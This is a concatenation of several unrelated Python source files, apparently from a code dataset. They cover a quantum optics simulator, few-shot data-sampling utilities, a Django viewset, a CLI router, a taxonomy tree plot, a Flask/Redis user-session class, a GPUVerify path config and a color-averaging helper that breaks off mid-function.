self._apply_gate(ops.displacement(alpha, self._trunc), [mode]) def beamsplitter(self, t, r, phi, mode1, mode2): """ Applies a beamsplitter. """ self._apply_gate(ops.beamsplitter(t, r, phi, self._trunc), [mode1, mode2]) def squeeze(self, r, theta, mode): """ Applies a squeezing gate. """ self._apply_gate(ops.squeezing(r, theta, self._trunc), [mode]) def kerr_interaction(self, kappa, mode): """ Applies a Kerr interaction gate. """ self._apply_gate(ops.kerr(kappa, self._trunc), [mode]) def cubic_phase_shift(self, gamma, mode): """ Applies a cubic phase shift gate. """ self._apply_gate(ops.cubicPhase(gamma, self._hbar, self._trunc), [mode]) def is_vacuum(self, tol): """ Tests whether the system is in the vacuum state. """ # base_shape = [self._trunc for i in range(self._num_modes)] if self._pure: vac = ops.vacuumState(self._num_modes, self._trunc) else: vac = ops.vacuumStateMixed(self._num_modes, self._trunc) return np.linalg.norm((self._state - vac).ravel()) < tol def get_state(self): """ Returns the state of the system in the fock basis along with its purity. """ return self._state, self._pure def loss(self, T, mode): """ Applies a loss channel to the state. """ self._apply_channel(ops.lossChannel(T, self._trunc), [mode]) def measure_fock(self, modes, select=None): """ Measures a list of modes. 
""" # pylint: disable=singleton-comparison if select is not None and np.any(np.array(select) == None): raise NotImplementedError("Post-selection lists must only contain numerical values.") # Make sure the state is mixed if self._pure: state = ops.mix(self._state, self._num_modes) else: state = self._state if select is not None: # perform post-selection # make sure modes and select are the same length if len(select) != len(modes): raise ValueError("When performing post-selection, the number of " "selected values (including None) must match the number of measured modes") # make sure the select values are all integers or nones if not all(isinstance(s, int) or s is None for s in select): raise TypeError("The post-select list elements either be integers or None") # modes to measure measure = [i for i, s in zip(modes, select) if s is None] # modes already post-selected: selected = [i for i, s in zip(modes, select) if s is not None] select_values = [s for s in select if s is not None] # project out postselected modes self._state = ops.project_reset(selected, select_values, self._state, self._pure, self._num_modes, self._trunc) if self.norm() == 0: raise ZeroDivisionError("Measurement has zero probability.") self._state = self._state / self.norm() else: # no post-selection; modes to measure are the modes provided measure = modes if len(measure) > 0: # sampling needs to be performed # Compute distribution by tracing out modes not measured, then computing the diagonal unmeasured = [i for i in range(self._num_modes) if i not in measure] reduced = ops.partial_trace(state, self._num_modes, unmeasured) dist = np.ravel(ops.diagonal(reduced, len(measure)).real) # Make a random choice if sum(dist) != 1: # WARNING: distribution is not normalized, could hide errors i = np.random.choice(list(range(len(dist))), p=dist / sum(dist)) else: i = np.random.choice(list(range(len(dist))), p=dist) permuted_outcome = ops.unIndex(i, len(measure), self._trunc) # Permute the outcome to match the order of the modes in 'measure' permutation = np.argsort(measure) outcome = [0] * len(measure) for i in range(len(measure)): outcome[permutation[i]] = permuted_outcome[i] # Project the state onto the measurement outcome & reset in vacuum self._state = ops.project_reset(measure, outcome, self._state, self._pure, self._num_modes, self._trunc) if self.norm() == 0: raise ZeroDivisionError("Measurement has zero probability.") self._state = self._state / self.norm() # include post-selected values in measurement outcomes if select is not None: outcome = copy.copy(select) return outcome def measure_homodyne(self, phi, mode, select=None, **kwargs): """ Performs a homodyne measurement on a mode. """ m_omega_over_hbar = 1/self._hbar # Make sure the state is mixed for reduced density matrix if self._pure: state = ops.mix(self._state, self._num_modes) else: state = self._state if select is not None: meas_result = select if isinstance(meas_result, numbers.Number): homodyne_sample = float(meas_result) else: raise TypeError("Selected measurement result must be of numeric type.") else: # Compute reduced density matrix unmeasured = [i for i in range(self._num_modes) if not i == mode] reduced = ops.partial_trace(state, self._num_modes, unmeasured) # Rotate to measurement basis args = [ops.phase(-phi, self._trunc), reduced, False, [0], 1, self._trunc] if self._mode == 'blas': reduced = ops.apply_gate_BLAS(*args) elif self._mode == 'einsum': reduced = ops.apply_gate_einsum(*args) # Create pdf. 
Same as tf implementation, but using # the recursive relation H_0(x) = 1, H_1(x) = 2x, H_{n+1}(x) = 2xH_n(x) - 2nH_{n-1}(x) if "max" in kwargs: q_mag = kwargs["max"] else: q_mag = 10 if "num_bins" in kwargs: num_bins = kwargs["num_bins"] else: num_bins = 100000 q_tensor, Hvals = ops.hermiteVals(q_mag, num_bins, m_omega_over_hbar, self._trunc) H_matrix = np.zeros((self._trunc, self._trunc, num_bins)) for n, m in product(range(self._trunc), repeat=2): H_matrix[n][m] = 1 / sqrt(2**n * bang(n) * 2**m * bang(m)) * Hvals[n] * Hvals[m] H_terms = np.expand_dims(reduced, -1) * np.expand_dims(H_matrix, 0) rho_dist = np.sum(H_terms, axis=(1, 2)) \ * (m_omega_over_hbar/pi)**0.5 \ * np.exp(-m_omega_over_hbar * q_tensor**2) \ * (q_tensor[1] - q_tensor[0]) # Delta_q for normalization (only works if the bins are equally spaced) # Sample from rho_dist. This is a bit different from tensorflow due to how # numpy treats multinomial sampling. In particular, numpy returns a # histogram of the samples whereas tensorflow gives the list of samples. # Numpy also does not use the log probabilities probs = rho_dist.flatten().real probs /= np.sum(probs) sample_hist = np.random.multinomial(1, probs) sample_idx = list(sample_hist).index(1) homodyne_sample = q_tensor[sample_idx] # Project remaining modes into the conditional state inf_squeezed_vac = \ np.array([(-0.5)**(n//2) * sqrt(bang(n)) / bang(n//2) if n%2 == 0 else 0.0 + 0.0j \ for n in range(self._trunc)], dtype=ops.def_type) alpha = homodyne_sample * sqrt(m_omega_over_hbar / 2) composed = np.dot(ops.phase(phi, self._trunc), ops.displacement(alpha, self._trunc)) args = [composed, inf_squeezed_vac, True, [0], 1, self._trunc] if self._mode == 'blas': eigenstate = ops.apply_gate_BLAS(*args) elif self._mode == 'einsum': eigenstate = ops.apply_gate_einsum(*args) vac_state = np.array([1.0 + 0.0j if i == 0 else 0.0 + 0.0j for i in range(self._trunc)], dtype=ops.def_type) projector = np.outer(vac_state, eigenstate.conj()) self._apply_gate(projector, [mode]) # Normalize self._state = self._state / self.norm() return homodyne_sample
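# --- Usage sketch (added; illustrative only, not part of the original module) ---
# Exercises the public methods defined above on a tiny one-mode register;
# it assumes the backing `ops` module behaves as in Strawberry Fields.
if __name__ == '__main__':
    reg = QReg(1, 10, pure=True)
    reg.prepare_mode_coherent(0.5 + 0.2j, 0)
    print('still vacuum?', reg.is_vacuum(tol=1e-6))
    print('fock measurement outcome:', reg.measure_fock([0]))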
StarcoderdataPython
3233697
import numpy as np
import torch
import random


def find_index(y_traj, y_rand):
    for idx, label in enumerate(y_rand[0]):
        if label == y_traj[0]:
            return idx


def sample_balanced_data(cactus_partition):
    for idx, cluster in enumerate(list(cactus_partition.values())):
        # Sample fixed elements after clustering --> balanced dataset
        random_samples_number = min(20, len(cluster))
        cluster = sorted(random.sample(cluster, random_samples_number))
        cactus_partition[idx] = cluster
    return cactus_partition


def sample_random_data(cactus_partition):
    for idx, cluster in enumerate(list(cactus_partition.values())):
        # Sample random data from mini-Imagenet after clustering
        min_len = 10
        max_len = 30
        random_samples_number = random.randint(min_len, min(max_len, len(cluster)))
        cluster = sorted(random.sample(cluster, random_samples_number))
        cactus_partition[idx] = cluster
    return cactus_partition


def sample_unbalanced_data(cactus_partition):
    lens = np.asarray([len(el) for el in cactus_partition.values()])
    min, max = lens.min(), lens.max()
    new_min, new_max = 10, 30
    new_lens = []
    for cluster in cactus_partition.values():
        new_cluster_len = int((((new_max - new_min) * (len(cluster) - min)) / (max - min)) + new_min)
        new_lens.append(new_cluster_len)
    for idx, cluster_len in enumerate(new_lens):
        cactus_partition[idx] = sorted(random.sample(cactus_partition[idx], cluster_len))
    return cactus_partition


def sample_reducted_dataset(data, labels, num_classes):
    # Sample fixed random data from mini-Imagenet before clustering
    sample_elements = 20
    data = np.array_split(data, num_classes)
    labels = np.concatenate(np.asarray(np.split(labels, num_classes))[:, :sample_elements])
    new_classes = []
    for i, cls in enumerate(data):
        indices = np.random.choice(cls.shape[0], sample_elements, replace=False)
        new_cls = []
        for idx in indices:
            new_cls.append(cls[idx])
        new_classes.append(np.stack((new_cls)))
    new_classes = np.concatenate(new_classes)
    return new_classes, labels


def compute_weigth_vector(cactus_partition):
    min_len = 1000
    max_len = 0
    for el in cactus_partition.items():
        if len(el[1]) >= max_len:
            max_len = len(el[1])
        if len(el[1]) < min_len:
            min_len = len(el[1])
    max_key = max(cactus_partition.keys())
    empty = dict.fromkeys(range(max_key + 1), [])
    cactus_partition = {**empty, **cactus_partition}
    balance_vector = []
    for idx, el in enumerate(sorted(cactus_partition.items())):
        if len(el[1]) != min_len:
            balance_vector.append((max_len - min_len) / (len(el[1]) - min_len))
        elif len(el[1]) == 0:
            balance_vector.append(0)
        else:
            balance_vector.append((max_len - min_len) / ((len(el[1]) + 1) - min_len))
    balance_vector = np.asarray(balance_vector).astype(np.float32)
    balance_vector = (balance_vector - balance_vector.min()) / (balance_vector.max() - balance_vector.min())
    return balance_vector


def set_seed(seed):
    torch.backends.cudnn.deterministic = True
    random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)
    np.random.seed(seed)


def remove_classes(trainset, to_keep):
    # trainset.data = trainset.data[order]
    trainset.targets = np.array(trainset.targets)
    # trainset.targets = trainset.targets[order]
    indices = np.zeros_like(trainset.targets)
    for a in to_keep:
        indices = indices + (trainset.targets == a).astype(int)
    indices = np.nonzero(indices)
    trainset.data = [trainset.data[i] for i in indices[0]]
    # trainset.data = trainset.data[indices]
    trainset.targets = np.array(trainset.targets)
    trainset.targets = trainset.targets[indices]
    return trainset
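# --- Usage sketch (added; illustrative only) ---
# The partition below is made up; values stand in for per-cluster sample
# indices.
if __name__ == '__main__':
    set_seed(0)
    partition = {0: list(range(40)), 1: list(range(5)), 2: list(range(25))}
    balanced = sample_balanced_data({k: list(v) for k, v in partition.items()})
    print({k: len(v) for k, v in balanced.items()})  # capped at 20 per cluster
    print(compute_weigth_vector(partition))  # larger weight for rarer clusters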
StarcoderdataPython
65697
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from rest_framework.viewsets import GenericViewSet
from rest_framework import mixins

from irekua_database import models
from irekua_rest_api import serializers
from irekua_rest_api import utils

from irekua_rest_api.permissions import IsAdmin
from irekua_rest_api.permissions import IsDeveloper
from irekua_rest_api.permissions import ReadOnly


class TermViewSet(mixins.UpdateModelMixin,
                  mixins.RetrieveModelMixin,
                  mixins.DestroyModelMixin,
                  utils.CustomViewSetMixin,
                  GenericViewSet):
    queryset = models.Term.objects.all()  # pylint: disable=E1101

    serializer_mapping = utils.SerializerMapping.from_module(
        serializers.terms.terms)

    permission_mapping = utils.PermissionMapping(
        default=IsDeveloper | IsAdmin | ReadOnly)
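# --- Usage sketch (added; the URL prefix and module placement are
# assumptions, not taken from the irekua_rest_api sources) ---
from rest_framework import routers

router = routers.DefaultRouter()
router.register(r'terms', TermViewSet)
urlpatterns = router.urls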
StarcoderdataPython
4801397
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************

from dlab_core.domain.exceptions import DLabException

LC_ERR_ARGUMENT_TYPE_DICT = 'Argument must be of type dict.'


class RoutingException(DLabException):
    """Base class for Routing exceptions"""
    pass


class RouteArgumentTypeException(RoutingException):
    pass


class RouteArgumentKeyException(RoutingException):
    pass


class RouteArgumentValueException(RoutingException):
    pass


class RouteInvokeCallableException(RoutingException):
    pass


class CLIRoute(object):

    def __init__(self, invoke, arguments):
        """
        :type invoke: callable
        :param invoke: method that will be invoked by router

        :type arguments: dict
        :param arguments: command, split into an array of strings
        """
        self.invoke = invoke
        self.arguments = arguments

    @property
    def invoke(self):
        """
        :rtype invoke: callable
        :return invoke: method that will be invoked by router
        """
        return self._invoke

    @invoke.setter
    def invoke(self, invoke):
        """
        :type invoke: callable
        :param invoke: method that will be invoked by router
        """
        if not callable(invoke):
            raise RouteInvokeCallableException()
        self._invoke = invoke

    @property
    def arguments(self):
        """
        :rtype arguments: dict
        :return arguments: dict of arguments, where key is index of argument
        and value - the argument itself
        """
        return self._arguments

    @arguments.setter
    def arguments(self, arguments):
        """
        :type arguments: dict
        :param arguments: dict of arguments, where key is index of argument
        and value - the argument itself
        """
        if not isinstance(arguments, dict):
            raise RouteArgumentTypeException(LC_ERR_ARGUMENT_TYPE_DICT)

        for item in arguments.items():
            self.validate_arguments_dict(*item)

        self._arguments = arguments

    @staticmethod
    def validate_arguments_dict(key, value):
        if not isinstance(key, int):
            raise RouteArgumentKeyException(key)

        if not isinstance(value, str):
            raise RouteArgumentValueException(value)


class CLIRouter(object):

    def __init__(self, routes=()):
        self._routes = []

        if len(routes):
            for route in routes:
                self.add(route)

    def add(self, route):
        """
        :type route: CLIRoute
        :param route: Cli route.
        """
        if isinstance(route, CLIRoute):
            self._routes.append(route)

    def match(self, args):
        """
        :type args: list
        :param args: command, split into an array of strings

        :rtype Route
        :return route matched by all parameters with maximum match size
        """
        items = [r for r in self._routes if self.match_args(r.arguments, args)]
        return self.extract_maximum_match(items)

    @staticmethod
    def extract_maximum_match(routes):
        # create list of dicts with route and sorted arguments index
        items = [{'route': r, 'indexes': sorted(r.arguments)} for r in routes]

        # while route items have elements in ordered indexes list
        while any(map(lambda x: x['indexes'], items)):
            # get general maximum index of all routes arguments
            max_id = max(map(lambda x: x['indexes'][-1], items))
            # pop maximum routes indexes and filter routes,
            # that has this index equal to general maximum value
            items = list(filter(lambda x: x['indexes'].pop() == max_id, items))

        return [item['route'] for item in items]

    @staticmethod
    def match_args(route_args, cli_args):
        """
        :type route_args: dict
        :param route_args: dict of route args

        :type cli_args: list
        :param cli_args: cli arguments

        :rtype: bool
        :returns True or False depending on matching cli args to routing args

        If maximum route arguments index is less than cli args count
        and values from cli equal corresponding indexes values return True
        """
        return (max(route_args) < len(cli_args) and all(
            [cli_args[index] == val for index, val in route_args.items()]))
StarcoderdataPython
6875
<filename>src_taxonomy/bubble_tree_map.py
#!/usr/bin/env python
# -*- coding: UTF-8 -*-

import random

from ete2 import Tree, TreeStyle, NodeStyle, faces, AttrFace, CircleFace, TextFace


def layout(node):
    if not node.is_root():
        # Add node name to leaf nodes
        #N = AttrFace("name", fsize=14, fgcolor="black")
        #faces.add_face_to_node(N, node, 0)
        #pass
        faces.add_face_to_node(TextFace(node.name), node, 0)
    if "weight" in node.features:
        # Creates a sphere face whose size is proportional to node's
        # feature "weight"
        C = CircleFace(radius=node.weight, color="RoyalBlue", style="sphere")
        # Let's make the sphere transparent
        C.opacity = 0.3
        # And place as a float face over the tree
        faces.add_face_to_node(C, node, 0, position="float")


def give_tree_layout(t):
    # Some random features in all nodes
    for n in t.traverse():
        n.add_features(weight=n.dist*20)

    # Create an empty TreeStyle
    ts = TreeStyle()

    # Set our custom layout function
    ts.layout_fn = layout

    # Draw a tree
    #ts.mode = "c"
    #ts.arc_start = -180
    #ts.arc_span = 180

    # We will add node names manually
    #ts.show_leaf_name = True

    # Show branch data
    #ts.show_branch_length = True
    #ts.show_branch_support = True

    return ts


class Tree7s(object):
    def __init__(self, lab):
        self.root = Node7s(lab, 0, 0)

    def find_root(self):
        return self.root


class Node7s(object):
    def __init__(self, data, score, lev):
        self.data = data
        self.score = score
        self.level = lev
        self.children = []

    def add_child(self, lab, score, lev):
        if int(self.level) == int(lev-1):
            nn = self.find_child(lab)
            if nn == None:
                self.children.append(Node7s(lab, score, lev))
            else:
                nn.increase_score(score)
        else:
            print "Trying to add to a wrong level?", lev-1, self.level, lab, self.data

    def find_child(self, label):
        for el in self.children:
            if el.data == label:
                return el
        return None

    def increase_score(self, sc):
        self.score += sc

    def print_me(self):
        print self.data, self.score
        for el in self.children:
            el.print_me()

    def create_newick(self):
        if self.children == []:
            return str(self.data + ":" + str(self.score))
        newick = "("
        for el in self.children:
            newick += el.create_newick() + ","
        newick = newick[:-1]
        if self.level == 0:
            newick += ")" + str(self.data) + "."
        else:
            newick += ")" + str(self.data) + ":" + str(self.score)
        return newick


def test_data():
    D = {'taxonomy': [{"score": "0.718868", "label": "/art and entertainment/movies and tv/movies"},
                      {"confident": "no", "score": "0.304296", "label": "/pets/cats"},
                      {"score": "0.718868", "label": "/art and entertainment/movies and tv/series"}]}

    t7s = Tree7s("ThingAdamsFamily")

    for el in D["taxonomy"]:
        #n = t7s
        n = t7s.find_root()
        taxonomy_tree = el["label"]
        taxonomy_tree = taxonomy_tree.split("/")
        taxonomy_tree.pop(0)
        levels = len(taxonomy_tree)
        score = float(el["score"])
        print levels, taxonomy_tree, score

        for i in range(levels):
            label = taxonomy_tree[i]
            #if n.find_child(label) == None:
            n.add_child(label, score, i+1)
            n = n.find_child(label)

    t7s.find_root().print_me()
    t = t7s.find_root()
    S = t.create_newick() + ";"
    print S

    #S = "(((A,B,(C.,D)E)F,(S,N)K)R);"
    #T = Tree(S, format=8)
    T = Tree(S, format=1)

    for node in T.traverse("postorder"):
        # Do some analysis on node
        print node.name

    for node in T.traverse("levelorder"):
        # Do some analysis on node
        print node.name

    #for branch in T
    return T


if __name__ == "__main__":
    #t.render("bubble_map.png", w=600, dpi=300, tree_style=ts)
    #t.show(tree_style=ts)

    t = test_data()
    ts = give_tree_layout(t)
    t.show(tree_style=ts)
    t.render("bubble_map.png", w=600, dpi=300, tree_style=ts)
StarcoderdataPython
39756
<filename>laba/user.py from flask import g, session import pymysql import redis import random import string from json import loads, dumps from exceptions.userException import * from hashlib import sha256 class User(): __changed = {} _values = {} __loggedIn = True __initialized = False __health = False def __init__(self): raise NotInitializeable("User") def _init(self, app): """User Object""" self.app = app if not hasattr(g, 'db'): g.db = pymysql.connect(user=app.config["DB_USER"], db=app.config["DB_DB"], password=app.config["DB_PWD"], host=app.config["DB_HOST"], cursorclass=pymysql.cursors.DictCursor) self.cursor = g.db.cursor() if not hasattr(g, 'redis'): g.redis = redis.Redis(host=app.config["REDIS_HOST"], port=app.config["REDIS_PORT"], db=app.config["REDIS_DB"]) self.__initialized = True # |\_/| # | @ @ Watch! # | <> _ # | _/\------____ ((| |)) # | `--' | # ____|_ ___| |___.' # /_/_____/____/_______| #^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ def query(self, query, param = ()): self.cursor.execute(query, param) return self.cursor.fetchall() def queryOne(self, query, param = ()): self.cursor.execute(query, param) return self.cursor.fetchone() def recover(self): """Call to prevent pymysql Interface error after recovering from session cache""" if not hasattr(g, 'db'): g.db = pymysql.connect(user=self.app.config["DB_USER"], db=self.app.config["DB_DB"], password=self.app.config["DB_PWD"], host=self.app.config["DB_HOST"], cursorclass=pymysql.cursors.DictCursor) self.cursor = g.db.cursor() if not hasattr(g, 'redis'): g.redis = redis.Redis(host=self.app.config["REDIS_HOST"], port=self.app.config["REDIS_PORT"], db=self.app.config["REDIS_DB"]) @property def wsuuid(self): return g.redis.get(self._values["username"]) @wsuuid.setter def wsuuid(self, wsuuid): g.redis.set(self._values["username"], wsuuid, self.app.config["AUTO_LOGOUT"]) @wsuuid.deleter def wsuuid(self): g.redis.delete(self._values["username"]) @property def id(self): return self._values["id"] @property def uuid(self): return self.__uuid @property def health(self): return self.__health @property def username(self): return self._values["username"] @username.setter def username(self, value): if self._values["username"] != value: self._values["username"] = value self.__changed['username'] = value @property def firstName(self): return self._values["firstName"] @firstName.setter def firstName(self, value): if self._values["firstName"] != value: self._values["firstName"] = value self.__changed['firstName'] = value @property def lastName(self): return self._values["lastName"] @lastName.setter def lastName(self, value): if self._values["lastName"] != value: self._values["lastName"] = value self.__changed['lastName'] = value @property def email(self): return self._values["email"] @email.setter def email(self, value): if self._values["email"] != value: self._values["email"] = value self.__changed['email'] = value @property def ctime(self): return self._values["ctime"] @ctime.setter def ctime(self, value): if self._values["ctime"] != value: self._values["ctime"] = value self.__changed['ctime'] = value @property def atime(self): return self._values["atime"] @atime.setter def atime(self, value): if self._values["atime"] != value: self._values["atime"] = value self.__changed['atime'] = value @property def status(self): return self._values["status"] @status.setter def status(self, value): if self._values["status"] != value: self._values["status"] = value self.__changed['status'] = value @property def icon(self): return self._values["icon"] @icon.setter def 
icon(self, value): if self._values["icon"] != value: self._values["icon"] = value self.__changed['icon'] = value def changePwd (self, old, new): r = self.cursor.execute("UPDATE users SET password=<PASSWORD>(%s, <PASSWORD>) WHERE id=%s AND password=<PASSWORD>, <PASSWORD>);", (new, self.__id, old)) if not r: raise BadUserCredentials(self.__username) def commit2db(self): if self.__changed: sql="UPDATE users SET {0} WHERE users.id = {1}".format(", ".join(i+"=%s" for i in self.__changed.keys()), self._values["id"]) self.query(sql, tuple(self.__changed.values())) def __serialize(self): self._values['atime'] = str(self._values['atime']) #Keep private! It's changing self.__value!!! self._values['ctime'] = str(self._values['ctime']) return dumps(self._values) def commit2redis(self): g.redis.set(self._uuid, self.__serialize(), self.app.config["AUTO_LOGOUT"]) def logOut(self): self.__loggedIn = False g.redis.delete(session["uuid"]) session.pop("uuid") def startSession(self): self.__health = True def __del__(self): if self.__initialized and self.__health: self.commit2db() self.cursor.close() g.db.commit() if self.__loggedIn: self.commit2redis() class LoginUser(User): def __init__(self, app, username, password): """Checks User cred and logs in + moves to redis if ready""" User._init(self, app) self._values = self.queryOne("""SELECT id, username, firstName, lastName, email, ctime, atime, status, icon, enabled FROM users WHERE (username = %s or email = %s) AND password = <PASSWORD>)""", (username, username, password)) if not self._values: raise BadUserCredentials(username) if not self._values["enabled"]: raise UserDisabled(username) self.startSession() self._uuid = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(32)]) session['uuid'] = self._uuid class RedisUser(User): def __init__(self, app): if not 'uuid' in session: raise UserNotInitialized() User._init(self, app) self._uuid = session["uuid"] vals = g.redis.get(session['uuid']) if not vals: session.pop("uuid") raise UserNotInitialized() self.startSession() self._values = loads(vals) class RegisterUser(): _values = {} def __init__(self, app): self.app = app assert not 'uuid' in session if not hasattr(g, 'db'): g.db = pymysql.connect(user=app.config["DB_USER"], db=app.config["DB_DB"], password=app.config["DB_PWD"], host=app.config["DB_HOST"], cursorclass=pymysql.cursors.DictCursor) self.cursor = g.db.cursor() if not hasattr(g, 'redis'): g.redis = redis.Redis(host=app.config["REDIS_HOST"], port=app.config["REDIS_PORT"], db=app.config["REDIS_DB"]) def query(self, query, param = ()): self.cursor.execute(query, param) return self.cursor.fetchall() def queryOne(self, query, param = ()): self.cursor.execute(query, param) return self.cursor.fetchone() @property def username(self): return self._values["username"] @username.setter def username(self, value): if self.queryOne("SELECT id FROM users WHERE username=%s", value): raise RegistrationErrorDupplicate("username") self._values["username"] = value @property def email(self): return self._values["email"] @email.setter def email(self, value): if self.queryOne("SELECT id FROM users WHERE email=%s", value): raise RegistrationErrorDupplicate("email") self._values["email"] = value @property def firstName(self): return self._values["firstName"] @firstName.setter def firstName(self, value): self._values["firstName"] = value @property def lastName(self): return self._values["lastName"] @lastName.setter def lastName(self, value): self._values["lastName"] = value @property def password(self): 
return self._values["password"] @password.setter def password(self, val): self._values["password"] = sha256(val.encode()).hexdigest() def commit2redis(self): if not all(k in self._values for k in ["email", "password", "username", "firstName", "lastName"]): for i in ["email", "password", "username", "firstName", "lastName"]: if i not in self._values: raise RegistrationErrorInfoMissing(i) token = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(32)]) g.redis.set(token, dumps(self._values), self.app.config["TOKEN_TIMEOUT"]) return token def confirmToken(self, token): vals = loads(g.redis.get(token)) if not vals: raise InvalidToken(token) g.redis.delete(token) #WARNING: No check for dupl entry -> time from registerRequest to confirmation: unprotected ~ Problem? #Without Exception Handling in Prod. env.: YES -> apk BBQ try: self.query("INSERT INTO users (email, password, username, firstname, lastname) VALUES (%s, %s, %s, %s, %s)", ( vals["email"], vals["password"], vals["username"], vals["firstName"], vals["lastName"])) except pymysql.IntegrityError: raise RegistrationErrorDupplicate("email / username")
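# --- Usage sketch (added; illustrative only) ---
# Rough request-handler wiring for the classes above. The Flask app, route
# name and error handling are assumptions; real usage needs a request
# context plus the MySQL/Redis settings this module reads from app.config,
# so the sketch is left commented out.
#
#   from flask import Flask, request
#   app = Flask(__name__)
#
#   @app.route('/login', methods=['POST'])
#   def login():
#       try:
#           user = LoginUser(app, request.form['username'],
#                            request.form['password'])
#           return {'status': 'ok', 'user': user.username}
#       except BadUserCredentials:
#           return {'status': 'bad credentials'}, 401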
StarcoderdataPython
73235
""" This module defines the paths that GPUVerify will use to run the various tools that GPUVerify Depends on. These paths must be absolute paths. """ import os import sys # THIS IS A TEMPLATE FOR DEVELOPMENT. MODIFY THE PATHS TO SUIT YOUR BUILD # ENVIRONMENT. THEN COPY THIS FILE INTO THE ROOT GPUVERIFY DIRECTORY (where # GPUVerify.py lives) AND RENAME IT TO "gvfindtools.py". "gvfindtools.py" WILL # BE IGNORED BY MERCURIAL SO IT WILL NOT BE UNDER VERSION CONTROL SO THAT YOU # CAN MAINTAIN YOUR OWN PERSONAL COPY OF "gvfindtools.py" WITHOUT AFFECTING # OTHER DEVELOPERS. # # Please note Windows users should use the following style: # rootDir = r"c:\projects\gpuverify" # bugleSrcDir = rootDir + r"\bugle\src" rootDir = os.environ["BUILD_ROOT"] # The path to the Bugle Source directory. # The include-blang/ folder should be there bugleSrcDir = os.environ["BUGLE_DIR"] # The Path to the directory where the "bugle" executable can be found. bugleBinDir = bugleSrcDir + "/build" # The path to the libclc Source directory. libclcSrcDir = rootDir + "/libclc" # The path to the libclc install directory. # The include/ and lib/clc/ folders should be there libclcInstallDir = rootDir + "/libclc-install" # The path to the llvm Source directory. llvmSrcDir = rootDir + '/llvm' # The path to the directory containing the llvm binaries. # llvm-nm, clang and opt should be there llvmBinDir = os.environ["DOWNLOADS_DIR"] + "/" + os.environ["LLVM"] + "/bin" # The path containing the llvm libraries llvmLibDir = os.environ["DOWNLOADS_DIR"] + "/" + os.environ["LLVM"] + "/lib" # The path to the directory containing the GPUVerify binaries. # GPUVerifyVCGen.exe, GPUVerifyCruncher.exe and GPUVerifyBoogieDriver.exe should be there gpuVerifyBinDir = os.environ["GPUVERIFY_DIR"] + "/Binaries" # The path to the z3 Source directory. z3SrcDir = rootDir + '/z3' # The path to the directory containing z3.exe z3BinDir = rootDir # The path to the cvc4 Source directory. cvc4SrcDir = rootDir + '/CVC4' # The path to the directory containing cvc4.exe cvc4BinDir = rootDir # Default solver should be one of ['z3','cvc4'] defaultSolver = os.environ["DEFAULT_SOLVER"] # If true mono will prepended to every command involving CIL executables useMono = True if os.name == 'posix' else False def init(prefixPath): """This method does nothing""" pass
StarcoderdataPython
4816128
from collections import defaultdict
from functools import wraps

from lru import LRU

import math

BoundCache = defaultdict(lambda: LRU(3000))


class Color:
    ZERO = (0, 0, 0, 0)
    WHITE = (0, 0, 1, 3500)

    EMPTIES = (ZERO, None)

    @classmethod
    def dead(kls, color):
        return color in kls.EMPTIES or color[2] == 0

    @classmethod
    def override(kls, color, hue=None, saturation=None, brightness=None, kelvin=None):
        if hue is None and saturation is None and brightness is None and kelvin is None:
            return color

        # Wrapping a value in a tuple tells adjust() to replace rather than offset
        hue_change = (hue,) if hue is not None else None
        saturation_change = (saturation,) if saturation is not None else None
        brightness_change = (brightness,) if brightness is not None else None
        kelvin_change = (kelvin,) if kelvin is not None else None

        return kls.adjust(
            color,
            hue_change=hue_change,
            saturation_change=saturation_change,
            brightness_change=brightness_change,
            kelvin_change=kelvin_change,
        )

    @classmethod
    def adjust(
        kls,
        color,
        hue_change=None,
        saturation_change=None,
        brightness_change=None,
        kelvin_change=None,
    ):
        h, s, b, k = color

        # A tuple change replaces the component outright; a bare number is a relative delta
        if hue_change is not None and isinstance(hue_change, tuple):
            h = hue_change[0]
        elif hue_change:
            h += hue_change

        if saturation_change is not None and isinstance(saturation_change, tuple):
            s = saturation_change[0]
        elif saturation_change:
            s += saturation_change

        if brightness_change is not None and isinstance(brightness_change, tuple):
            b = brightness_change[0]
        elif brightness_change:
            b += brightness_change

        if kelvin_change is not None and isinstance(kelvin_change, tuple):
            k = kelvin_change[0]
        elif kelvin_change:
            k += kelvin_change

        # Clamp each adjusted component to its valid range
        if hue_change:
            if h < 0:
                h = 0
            elif h > 360:
                h = 360

        if saturation_change:
            if s < 0:
                s = 0
            elif s > 1:
                s = 1

        if brightness_change:
            if b < 0:
                b = 0
            elif b > 1:
                b = 1

        if kelvin_change:
            if k < 0:
                k = 0
            elif k > 0xFFFF:
                k = 0xFFFF
            else:
                k = int(k)

        return h, s, b, k


def average_color(colors):
    colors = [c for c in colors if c is not None]

    if not colors:
        return None

    if len(set(colors)) == 1:
        return colors[0]

    hue_x_total = 0
    hue_y_total = 0
    saturation_total = 0
    brightness_total = 0
    kelvin_total = 0

    for color in colors:
        if isinstance(color, tuple):
            h, s, b, k = color
        else:
            h = color.hue
            s = color.saturation
            b = color.brightness
            k = color.kelvin

        # Average hue on the unit circle so e.g. 350 and 10 average near 0, not 180
        hue_x_total += math.sin(h * 2.0 * math.pi / 360)
        hue_y_total += math.cos(h * 2.0 * math.pi / 360)

        saturation_total += s
        brightness_total += b

        # Treat kelvin 0 as the default white point
        if k == 0:
            kelvin_total += 3500
        else:
            kelvin_total += k

    hue = math.atan2(hue_x_total, hue_y_total) / (2.0 * math.pi)
    if hue < 0.0:
        hue += 1.0
    hue *= 360

    number_colors = len(colors)
    saturation = saturation_total / number_colors
    brightness = brightness_total / number_colors
    kelvin = int(kelvin_total / number_colors)

    return (hue, saturation, brightness, kelvin)


def _points_bound_cache(func):
    """Memoise the Points helpers in BoundCache, keyed by their arguments."""
    name = func.__name__

    if name in ("row", "col"):

        @wraps(func)
